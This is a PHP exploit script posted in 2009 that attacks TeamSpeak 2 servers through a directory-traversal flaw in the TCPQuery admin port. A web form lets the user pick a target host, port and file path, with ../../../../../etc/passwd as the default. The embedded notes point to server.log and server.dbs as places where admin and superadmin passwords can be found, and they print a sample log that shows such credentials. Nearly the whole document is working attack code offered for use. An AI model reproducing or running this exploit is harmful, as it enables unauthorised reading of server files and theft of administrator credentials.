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Posted on 14 January 2009

<?php // teamspeak server <= remote read file vulnerability // bug found and exploit write by c411k // http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734 zazhali ploent svolo4i!! // tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe // grats all https://forum.antichat.ru // use http://localhost/ts_xek.php // 10.01.09 error_reporting(0); @ini_set("max_execution_time",0); @ini_set('output_buffering',0); @set_magic_quotes_runtime(0); @set_time_limit(0); @ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8 "); header("Pragma: no-cache"); function check_ver($site, $xek, $port) { $url = fsockopen("$site", "$port", $errno, $errstr, 22); $send_pac = "$xek "; fputs($url, $send_pac); $s = ''; while (!feof($url) and strpos(implode($s), 'OK') === false) { $s[] = fgets($url, 1028); } fclose($url); return implode($s); } function html() { if (isset($_POST['file'])) $file = $_POST['file']; else $file = '../../../../../etc/passwd'; echo '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value="&#8194;read file...&#8194;"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value="&#8194;check_version&#8194;"><br> <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD">&#8194;&#172; teamspeak hostname or ip, for expamle "ts.antichat.ru" <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD">&#8194;&#172; port to TCQquery admin, default 51234 <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD">&#8194;&#172; file to read.'; } function info() { echo '<br> for example: server.log server.dbs ../../../../../boot.ini ../../../../../etc/passwd ../../../../../usr/local/apache/conf/httpd.conf etc. brain on ;) admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can't read this files. <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>--------------------------------------------------------------- -------------- log started at 10-01-09 00:24 ------------- --------------------------------------------------------------- 10-01-09 00:24:28,ALL,Info,server, Server init initialized 10-01-09 00:24:28,ALL,Info,server, Server version: Win32 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_servers 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_server_privileges 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_channels 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_channel_privileges 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_clients 10-01-09 00:24:28,WARNING,Info,SQL, created table ts2_bans 10-01-09 00:24:28,ALL,Info,server, Starting VirtualServer id:1 with port:8767 10-01-09 00:24:28,WARNING,Info,SERVER, Default VirtualServer created 10-01-09 00:24:28,WARNING,Info,SERVER, admin account info: username: admin password: kcqy8y 10-01-09 00:24:28,WARNING,Info,SERVER, superadmin account info: username: superadmin password: e7em45 10-01-09 00:24:29,ALL,Info,server, Server init finished</textarea></form>'; } function head() { echo '<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>xek_teamspeak2</title> <style> <!-- A:link {COLOR: #B9B9BD; TEXT-DECORATION: none} A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none} A:active {COLOR: #228B22; TEXT-DECORATION: none} A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline} BODY { margin="5"; FONT-WEIGHT: normal; COLOR: #B9B9BD; BACKGROUND: #44474F; FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; } --> </style> </head> <body>'; } head(); if (!$_GET) { html(); info(); } if (isset($_GET['go_fuck'])) { $hostname = $_POST['hostname']; $file = $_POST['file']; $port = $_POST['port']; if (isset($_POST['check_ver'])) { echo '<pre>'.check_ver($hostname, 'ver', $port); } if (isset($_POST['parampampam'])) { echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."", $port).'</textarea>'; html(); } } ?>